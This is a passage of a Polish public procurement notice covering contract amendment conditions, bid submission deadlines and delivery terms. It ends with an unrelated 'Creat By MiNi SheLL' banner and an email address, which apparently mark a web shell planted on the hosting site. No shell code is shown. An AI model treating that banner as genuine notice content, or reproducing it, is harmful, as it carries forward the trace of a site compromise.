również:<br/>a) pełnomocnictwo do reprezentowania Wykonawców składających ofertę wspólnie w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (w pełnomocnictwie należy wskazać zakres umocowania);<br/>b) kopię umowy regulującej współpracę Wykonawców składających ofertę wspólnie przed zawarciem umowy w sprawie zamówienia publicznego (potwierdzona za zgodność z oryginałem przez Wykonawcę – pełnomocnika). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli dotyczą one m.in.: <br/>a)	zmiany świadczenia Wykonawcy na świadczenie o tej samej lub lepszej jakości i parametrach przy zachowaniu tożsamości przedmiotu zamówienia (przy zachowaniu dotychczasowych cen),<br/>b)	zmiany terminu wykonania Umowy jeżeli jego niedochowanie wynika z przyczyn nie leżących po stronie Wykonawcy, z zastrzeżeniem §11 ust. 4 Umowy, <br/>c)	zmiany danych Wykonawcy (np. zmiana siedziby, adresu, nazwy),<br/>d)	zmiany rodzajów i wielkości opakowań,<br/>e)	zmiany przepisów prawnych (np. akcyza, VAT), jeżeli wpłynie na sposób wykonania lub na wysokość ceny – zgodnie ze zmienionymi przepisami,<br/>f)	zmiany norm przedmiotowych na produkt oraz zmiany zakresu i norm metod badań,<br/>g)	zmiany ilości i częstotliwości dostaw w przypadku decyzji stosownych organów wojskowych,<br/>h)	zmiany podwykonawcy uczestniczącego w realizacji Umowy, w wypadku, kiedy Wykonawca określił go, co do tożsamości w ofercie lub rezygnacji z podwykonawcy, a także pojawienia się podwykonawcy na dalszym etapie realizacji Umowy,<br/>i)	zmiany zakresu podwykonawstwa,<br/>j)	zmiany producenta przedmiotu zamówienia wyszczególnionego w Umowie,<br/>k)	umożliwienia dalszej realizacji przedmiotu Umowy przez konsorcjum, wspólników spółki cywilnej, z którego składu ubył jego członek.<br/>2.	Powyższe zmiany wymagają zachowania formy pisemnej (aneks) pod rygorem nieważności. Ostateczną decyzję w przedmiocie zmiany Umowy podejmuje Zamawiający po rozważeniu wszystkich istotnych dla sprawy okoliczności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-30 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z załącznikami w języku polskim za pośrednictwem platformy zakupowej pod adresem: https://platformazakupowa.pl/transakcja/1176811</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-30 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamówienie publiczne zostanie wykonane w terminie do 30 dni od dnia zawarcia Umowy.<br/>2.	W przypadku, gdy ostatni dzień realizacji zamówienia przypada na dzień wolny od pracy, np. sobota lub dni ustawowo wolne od pracy (np. niedziela lub święta), w kraju w którym siedzibę ma Zamawiający, to termin realizacji przypada na roboczy dzień poprzedzający dzień realizacji zamówienia. <br/>3.	W przypadku, gdyby termin realizacji Umowy miał zakończyć się po 28 listopada 2025 r., to ostatecznym dniem, w którym Wykonawca zobowiązuje się zrealizować Umowę jest dzień 28 listopada 2025 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com